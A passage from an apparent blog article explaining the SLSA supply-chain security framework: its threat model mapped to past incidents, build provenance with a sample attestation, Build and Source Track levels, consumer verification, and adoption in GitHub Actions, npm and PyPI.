&lt;li&gt;
&lt;strong&gt;Tenant&lt;/strong&gt;: The user or project using the build platform. In GitHub Actions, each repository's workflow acts as a tenant.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The Big Picture of SLSA
&lt;/h2&gt;

&lt;p&gt;SLSA is a framework that defines "what must be guaranteed at each stage of the supply chain" across different levels. It aligns nicely with NIST's Secure Software Development Framework (SSDF).&lt;/p&gt;

&lt;p&gt;The key here is that SLSA isn't a monolithic checklist. It's broken down into &lt;strong&gt;Tracks&lt;/strong&gt; tackling different aspects of the supply chain, with progressive &lt;strong&gt;Levels&lt;/strong&gt; inside each track.&lt;/p&gt;

&lt;p&gt;Current tracks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Build Track&lt;/strong&gt; (since v1.0): Protects build integrity. The most mature track.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Source Track&lt;/strong&gt; (added in v1.2): Protects source code integrity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build Environment Track&lt;/strong&gt; (drafting): Protects the integrity of the build execution environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dependency Track&lt;/strong&gt; (drafting): Manages risks from dependencies.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We'll focus heavily on the fully released Build and Source Tracks.&lt;/p&gt;




&lt;h2&gt;
  
  
  Threat Model: What Are We Protecting Against?
&lt;/h2&gt;

&lt;p&gt;To understand SLSA's design, you must understand the threat model. SLSA categorizes supply chain threats into 9 buckets, from &lt;strong&gt;(A)&lt;/strong&gt; to &lt;strong&gt;(I)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8rk4op0ym7ctg07ke99.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8rk4op0ym7ctg07ke99.png" alt="Threat Model" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SLSA doesn't fix everything. &lt;strong&gt;It directly mitigates threats (B) through (G).&lt;/strong&gt; A malicious producer (A), typosquatting (H), and bad usage (I) are explicitly out of scope.&lt;/p&gt;

&lt;p&gt;If we map real-world incidents to this threat model, it becomes terrifyingly clear this isn't just theoretical:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Threat&lt;/th&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;What Happened&lt;/th&gt;
&lt;th&gt;SLSA Mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(B)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SushiSwap (2021)&lt;/td&gt;
&lt;td&gt;A contractor with repo access pushed a commit stealing crypto.&lt;/td&gt;
&lt;td&gt;Source Track L4: Two-person review&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(C)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PHP (2021)&lt;/td&gt;
&lt;td&gt;Attackers compromised PHP's self-hosted git server and injected a backdoor commit.&lt;/td&gt;
&lt;td&gt;Source Track: Robust SCM requirements&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(D)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The Great Suspender (2020)&lt;/td&gt;
&lt;td&gt;A new maintainer published an extension built from an unverified, different source.&lt;/td&gt;
&lt;td&gt;Build Track: Detect source mismatch via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(E)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SolarWinds (2020)&lt;/td&gt;
&lt;td&gt;SUNSPOT swapped source files during the build and signed it.&lt;/td&gt;
&lt;td&gt;Build Track L3: Isolated builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(F)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Codecov (2021)&lt;/td&gt;
&lt;td&gt;Attackers directly uploaded a malicious script to GCS using leaked credentials.&lt;/td&gt;
&lt;td&gt;Build Track: Detect missing build via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(G)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Package Mirror Attack (2008)&lt;/td&gt;
&lt;td&gt;Researchers proved they could serve arbitrary packages by operating a mirror.&lt;/td&gt;
&lt;td&gt;Build Track: Verify origin via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Provenance: The Core of SLSA
&lt;/h2&gt;

&lt;p&gt;Before looking at the Build Track levels, you must understand SLSA's lifeblood: &lt;strong&gt;Provenance&lt;/strong&gt;. Every level in the Build Track revolves around this concept.&lt;/p&gt;

&lt;p&gt;Provenance is metadata detailing "where," "how," and "from what" an artifact was generated. SLSA structures this using the &lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto attestation&lt;/a&gt; format.&lt;/p&gt;

&lt;p&gt;Let's look at what GitHub Actions spits out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"_type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://in-toto.io/Statement/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"my-app-v1.2.3.tar.gz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicateType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa.dev/provenance/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicate"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"buildDefinition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"buildType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"externalParameters"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"workflow"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"refs/tags/v1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"repository"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/example/my-app"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"path"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;".github/workflows/release.yml"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"resolvedDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/example/my-app@refs/tags/v1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"gitCommit"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"abc123..."&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"runDetails"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"builder"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v2.1.0"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure holds 4 critical elements:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdaexp9mopvqvapydja8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdaexp9mopvqvapydja8.png" alt="Provenance Structure" width="686" height="955"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;externalParameters&lt;/strong&gt; is absolutely crucial. This is the "external input" to the build, and SLSA considers it untrusted. The consumer must check this field to answer, "Was this built from the correct repo and tag?" The Great Suspender incident happened entirely because this "built from what" verification didn't exist.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;builder.id&lt;/strong&gt; is equally important. When consumers see this ID, they assume "this build platform meets SLSA Build L3." In other words, &lt;strong&gt;trusting the build platform is a hard prerequisite.&lt;/strong&gt; This reflects SLSA's core principle: "Trust the platform, verify the artifact."&lt;/p&gt;




&lt;h2&gt;
  
  
  Build Track: Guaranteeing the Build
&lt;/h2&gt;

&lt;p&gt;With Provenance understood, let's dissect the Build Track. Each level is defined by "how hard it is to forge the Provenance."&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L1: Provenance Exists
&lt;/h3&gt;

&lt;p&gt;The bare minimum. The build process spits out Provenance.&lt;/p&gt;

&lt;p&gt;L1 Requirements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Follows a consistent build process (e.g., scripted).&lt;/li&gt;
&lt;li&gt;Provenance is generated (contains builder.id, buildType, externalParameters, subject).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Provenance does NOT need to be signed.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You might ask, "If it's unsigned, what's the point?" It actually has massive value. Just having Provenance makes incident response vastly easier. You can instantly answer, "Which commit did this binary come from?" It also prevents release accidents, like building from the wrong branch.&lt;/p&gt;

&lt;p&gt;However, in L1, forging Provenance is trivial. An attacker just edits the file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L2: Signed Provenance
&lt;/h3&gt;

&lt;p&gt;Two game-changing differences from L1:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;The build runs on a hosted platform&lt;/strong&gt; (not a developer's laptop).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Provenance is signed by the build platform.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpiej7wsv6f817vcs1z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpiej7wsv6f817vcs1z.png" alt="Signed Provenance" width="800" height="633"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Crucially, the signature is applied by the &lt;strong&gt;platform's control plane&lt;/strong&gt;, not the tenant (user). If the tenant signed it, leaked credentials would allow attackers to mint fake Provenance. Because the control plane signs it, forging Provenance requires compromising the build platform itself.&lt;/p&gt;

&lt;p&gt;L2 completely neuters Codecov-style attacks. An artifact uploaded directly without triggering a build simply won't have a platform-signed Provenance. When the consumer verifies it, the attack fails.&lt;/p&gt;

&lt;p&gt;But L2 has a flaw: &lt;strong&gt;It doesn't require isolation between tenants on the same platform.&lt;/strong&gt; A malicious tenant could theoretically interfere with another tenant's build or access signing keys.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L3: Hardened Builds
&lt;/h3&gt;

&lt;p&gt;L3 is engineered to defeat SolarWinds-style attacks. It adds 3 requirements:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Isolated builds&lt;/strong&gt;: Every build runs in a strictly isolated environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invisible signing keys&lt;/strong&gt;: User-defined build steps have zero access to the signing keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complete externalParameters&lt;/strong&gt;: Every single external input is logged in the Provenance.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzf204mo290c1lf1kcqp7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzf204mo290c1lf1kcqp7.png" alt="Build L3" width="800" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Think back to SUNSPOT. It hijacked the build environment to swap source files. L3 makes this agonizingly difficult:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Because builds are isolated, injecting malware from the outside requires breaching the platform itself.&lt;/li&gt;
&lt;li&gt;Even if attackers inject malware into the build step, they can't access the signing key, meaning they can't forge a validly signed Provenance.&lt;/li&gt;
&lt;li&gt;Because the Control Plane generates the Provenance, the tenant's code cannot manipulate what gets written.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It makes attacks &lt;em&gt;difficult&lt;/em&gt;, not &lt;em&gt;impossible&lt;/em&gt;. If the control plane has a vulnerability, L3 falls. But the bar is raised exponentially.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build Track Level Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Requirement&lt;/th&gt;
&lt;th&gt;L1&lt;/th&gt;
&lt;th&gt;L2&lt;/th&gt;
&lt;th&gt;L3&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Consistent build process&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Provenance generation&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hosted build platform&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signed Provenance&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build isolation&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Invisible signing keys&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complete externalParameters&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Difficulty of forging Provenance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Trivial&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Requires platform compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Requires exploiting vulnerabilities&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Source Track: Defending the Source Code
&lt;/h2&gt;

&lt;p&gt;While the Build Track protects the "integrity of the build process," the Source Track protects the "integrity of the source code handed to the build." It's a relatively new addition finalized in v1.2.&lt;/p&gt;

&lt;p&gt;The problem the Source Track solves is dead simple: If you generate flawless Provenance in the Build Track but the source code was already poisoned, you've accomplished nothing. In the PHP incident, attackers hacked the git server and injected a backdoor commit. The Build Track alone cannot tell if that commit is legitimate.&lt;/p&gt;

&lt;h3&gt;
  
  
  The 4 Levels of the Source Track
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Source L1: Version Controlled.&lt;/strong&gt; Source code is stored in a VCS like Git. It's vastly superior to emailing ZIP files, but offers almost zero guarantees.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L2: History and Provenance.&lt;/strong&gt; Branch history must be continuous and immutable. The Source Code Management (SCM) system must issue a Source Provenance Attestation for every revision. Think of this as Build Provenance for code: it records "when, by who, and how the change was made." Force pushes and history rewriting are banned.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L3: Technical Controls.&lt;/strong&gt; The SCM &lt;strong&gt;enforces policies at the system level&lt;/strong&gt;. Rules like "no direct pushes to main" aren't just polite requests in a README; they are technically impossible to violate. Verifiers can mathematically prove "this revision was created following the correct procedures."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L4: Two-Person Review.&lt;/strong&gt; All changes to protected branches require review by two trusted individuals. This entirely blocks SushiSwap-style attacks where an insider pushes malicious code unilaterally. If one developer's credentials are stolen, the second reviewer acts as a hard wall.&lt;/p&gt;




&lt;h2&gt;
  
  
  Verification Flow: What Must Consumers Check?
&lt;/h2&gt;

&lt;p&gt;Generating and signing Provenance is useless if nobody checks it. SLSA dictates a strict 3-step verification process for consumers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgmivr8m7d23jvucm698.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgmivr8m7d23jvucm698.png" alt="Verification Flow" width="643" height="1079"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt; asks, "Has this Provenance been tampered with?" You verify the signature and ensure the subject digest inside the Provenance perfectly matches the actual artifact in your hands. This proves it wasn't swapped for a fake binary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt; asks, "Was it built the way we expected?" This is where &lt;strong&gt;externalParameters verification&lt;/strong&gt; happens. Is the builder.id trusted? Is the source repo legitimate? Is the workflow what we expected? SLSA demands that you &lt;strong&gt;reject the artifact if there are unknown fields&lt;/strong&gt;. This prevents verifiers from accidentally ignoring unexpected parameters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3&lt;/strong&gt; is recursive dependency verification. But let's be real: traversing the Provenance of every single dependency is an operational nightmare. This is exactly what &lt;strong&gt;VSA (Verification Summary Attestation)&lt;/strong&gt; solves.&lt;/p&gt;

&lt;h3&gt;
  
  
  VSA: Making Dependency Verification Realistic
&lt;/h3&gt;

&lt;p&gt;A VSA is a higher-level attestation stating, "A trusted verifier has already validated the Provenance for this artifact."&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl40e0c3epwel83ljd545.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl40e0c3epwel83ljd545.png" alt="vsa" width="800" height="476"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;npm implemented exactly this model. When you upload a package, npm verifies the Provenance server-side and displays the result on npmjs.com. Consumers treat npm as the trusted verifier, entirely bypassing the need to verify individual Provenance files themselves.&lt;/p&gt;




&lt;h2&gt;
  
  
  Real-World Implementations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  GitHub Actions: Achieving Build L3
&lt;/h3&gt;

&lt;p&gt;The mechanism that generates SLSA Build L3 Provenance on GitHub Actions is &lt;code&gt;slsa-framework/slsa-github-generator&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfczx2o7d4kfbh9isbxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhfczx2o7d4kfbh9isbxe.png" alt="Real World Implementation" width="800" height="602"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is how the L3 isolation requirement is met. Provenance generation is implemented as a &lt;strong&gt;Reusable Workflow&lt;/strong&gt; running in a completely separate execution environment from the user's workflow. The user's code has zero access to the Provenance generation or signing process.&lt;/p&gt;

&lt;p&gt;It leverages Sigstore's keyless signing. GitHub Actions workflows generate OIDC (OpenID Connect) tokens at runtime containing proof of "which repo, which workflow, and which trigger ran this." &lt;code&gt;slsa-github-generator&lt;/code&gt; presents this token to Fulcio (Sigstore's CA) to grab a short-lived signing certificate. The signature is immortalized in Rekor (transparency log). This achieves publicly verifiable signatures with zero long-term key management.&lt;/p&gt;

&lt;h3&gt;
  
  
  npm: The Deepest Ecosystem Integration
&lt;/h3&gt;

&lt;p&gt;npm rolled out Provenance support in 2023, boasting the deepest SLSA integration of any package ecosystem to date.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simply appending the &lt;code&gt;--provenance&lt;/code&gt; flag to &lt;code&gt;npm publish&lt;/code&gt; pushes packages with Provenance from GitHub Actions or GitLab CI/CD.&lt;/li&gt;
&lt;li&gt;Build Provenance details are front and center on every package page on npmjs.com.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;npm audit signatures&lt;/code&gt; can batch-verify the Provenance of your entire dependency tree.&lt;/li&gt;
&lt;li&gt;Provenance is signed via Sigstore and recorded in public transparency logs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  PyPI: PEP 740 Digital Attestations
&lt;/h3&gt;

&lt;p&gt;PyPI officially introduced Digital Attestation support in November 2024 via PEP 740. It operates in tandem with Trusted Publishing (OIDC-based auth from GitHub Actions, etc.). PyPA's publishing action v1.11.0 enables it by default, bringing around 20,000 packages into Attestation-ready status.&lt;/p&gt;

&lt;p&gt;However, as of November 2024, only about 5% of the top 360 most downloaded packages actually carried Attestations. While roughly two-thirds of the top packages haven't cut a release since the feature dropped, the ecosystem integration is undeniably shallower than npm right now. You can track adoption at &lt;a href="https://trailofbits.github.io/are-we-pep740-yet/" rel="noopener noreferrer"&gt;Are we PEP 740 yet?&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  What SLSA Does Not Cover
&lt;/h2&gt;

&lt;p&gt;It's incredibly tempting to say, "It's SLSA Build L3 compliant, so it's perfectly safe." But it's not. Misunderstanding SLSA's boundaries breeds fatal overconfidence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It does not evaluate code quality.&lt;/strong&gt; SLSA doesn't care if your source code is riddled with zero-days. It guarantees "the code wasn't tampered with," not "the code is inherently safe."&lt;/p&gt;

